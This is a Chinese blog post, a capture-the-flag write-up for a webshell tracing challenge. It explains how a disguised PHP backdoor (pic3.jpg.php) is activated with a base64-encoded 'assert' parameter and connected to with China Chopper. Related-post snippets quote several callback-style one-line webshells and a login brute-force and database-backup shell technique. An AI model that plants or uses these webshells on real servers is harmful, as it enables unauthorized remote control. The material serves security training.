360众测靶场题库之35-WebShell代码分析溯源(第6题)

最新推荐文章于 2024-10-02 20:29:39 发布
最新推荐文章于 2024-10-02 20:29:39 发布
阅读量192 收藏
点赞数 1
分类专栏: 360众测靶场题库 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjl12344/article/details/136568849
版权

下载并分析源码:

发现pic3.jpg.php,打开如下所示:

所以我们使用assert函数,但是前面有base64decode,因此我们需要让e等于assert进行base64编码后的值,即 YXNzZXJ0

使用中国菜刀连接

构造url如下:http://219.153.49.228:42640/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0,密码为POST,菜刀连接:

BugBounty
关注
专栏目录
墨者 - WebShell代码分析溯源(第6)
吃肉唐僧的博客
07-13 249
下载文件,又是一番探索木马文件 发现如下代码 <?php error_reporting(0); $e = $_REQUEST['e']; $arr = array($_POST['POST'],); array_map(base64_decode($e), $arr); ?> 这个也是一句木马的变种,获取url的e参数值(需要经过base64编码),链接密码是POST ...
墨者学院-WebShell代码分析溯源(第6)
JimWu的博客
09-04 242
WebShell代码分析溯源(第6) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀、记事本 1.访问网页,下载网页源代码。 2.查看每个文件夹的源代码,发现在/Assets/upload中有可疑文件,php文件想冒充jpg。 3.打开文件,发现果然是一句话木马。 分析代码,了解到array_map属于回调函数。 base64_decode(e)为函数,e)为函数,...
墨者学院 - WebShell代码分析溯源(第6)
多崎巡礼的博客
08-03 452
审查代码,在图片文件夹中有php(有毒) 使用了回调函数array_map(将用函数去执行每个参数,返回结果)、$_REQUEST、$_POST,通过分析, 类似于第五,用e来接受assert的base64加密的值作为函数,用POST作为密码 使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST,key文件在/var...
墨者学院WebShell代码分析溯源(第6)
vergilben的学习日记
04-03 9561
墨者学院WebShell代码分析溯源(第6) 进入环境: 下载并分析源码: 在如上路径中发现pic3.jpg.php,打开如下所示: 图中箭头指的很明显,是一句话木马,需要用到菜刀连接,但是后面很明显与base64有关,所以,我们需要一个指令来让它变成(xxx,一句话木马),思考一下这里应该是个插入语句,我们平常用到的,是eval函数,但我们看一下eval函数的解释: 所以eval函数是无...
墨者学院-CMS系统漏洞分析溯源(第6)
a519395243的博客
12-26 585
按提示先找后台,用御剑找后台 后台地址 ip/servlets/ 在首页找到 mozhe777 用户,利用emlog博客的漏洞,错误不刷新验证码爆破密码 用burp 爆破 爆破出密码为 qwer1234 登录成功后,点击数据库栏目 再点击备份数据库 编辑备份下来的数据库,在末尾添加sql(新建emlog_shell数据表,向该表中添加小马,写入文件,再删除) dr...
360众测靶场题库之39-WebShell代码分析溯源(第3)
zjl12344的博客
03-08 139
360众测靶场题库
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 833
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
墨者学院 - WebShell代码分析溯源(第11)
多崎巡礼的博客
08-06 731
&lt;?php  if(!empty($_GET[1]) &amp;&amp; $_GET[1]=='GET.fPZ87'){                     //若get到的1不为空且1=GET.fPZ87的话执行下面操作     $_=@fopen('t.php', 'a');                                                      ...
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 705
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 794
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   &lt;?php...
墨者学院 - WebShell代码分析溯源(第7)
多崎巡礼的博客
08-05 691
代码审查 在random_int.php 前排 发现以下回调后门 &lt;?php error_reporting(0); $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['POST']); uasort($arr, base64_decode($e)); 诸如此类还有 &lt;?php $e = $_REQUEST['...
墨者学院 - WebShell代码分析溯源(第8)
多崎巡礼的博客
08-05 726
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。 C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php   &lt;?php error_reporting(0); ...
【网络安全 | JAVA代码审计】基础安全和解决方法初探
等风来
10-02 685
无占位符的预处理,其实质仍然是通过字符串拼接的方式来构造SQL语句,SQL注入依然存在,这是开发中需要谨记的。
【超强组合】基于淘金优化算法GRO-BP-Adaboost的数据分类预测算法Matlab实现.rar
最新发布
10-08
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
VMware Workstation Pro 和 VMware Fusion 安装与配置指南
10-08
内容概要:本文档详细指导了如何在不同的主机环境下,通过 VMWare 的两款产品——Workstation Pro 和 Fusion 进行新虚拟机的构建流程以及具体的操作要点说明。 适用人群:希望在单一机器上部署多操作系统的工作环境或学习测试场景的技术人员和学生。 使用场景及目标:旨在帮助初学者搭建属于自己的虚拟机实验平台,从而方便进行软件测试或者研究操作系统相关的新特性等任务,同时也有利于团队间的协作和资源调配。 注意事项:文中涉及的具体操作如下载源文件、配置网络参数时要注意版权合法性问和技术安全防范。此外还需依据各自电脑的软硬件条件适当增减虚拟机的资源设定。
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
10-08
科研经费管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
使用Python Matplotlib进行图形输出与保存详解(包含详细的完整的程序和数据)
10-08
内容概要:本文详细介绍了使用 Python 的 Matplotlib 库来输出和保存图形的方法。不仅涉及了基本流程,如生成图表并将之导出成PNG、PDF和SVG等不同格式的内容,还包括高级话如设置透明度、分辨率以及制作包含图形元素的HTML页面等。文章通过一个具体的示例代码讲解了各个环节的关键细节和技术要点。 适用人群:对数据可视化有兴趣的初学者及具有一定基础想要深入学习 Matplotlib 使用技巧的技术人员。 使用场景及目标:适用于需要掌握 Matplotlib 不同输出选项及其特点的应用场合,尤其是当需要生成用于打印或网页展示的高质量、可自定义外观的图形时。
基于文本向量的PHP-webshell检测:XGBoost与TF-IDF算法提升准确性
动态检测通过监测代码执行过程中的敏感行为,如流量变化和系统指令,但其缺点包括高部署难度、资源占用大和检测周期长,不适用于大规模批量检测,还可能影响Web系统的性能。 传统的静态检测方法主要依赖于正则...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值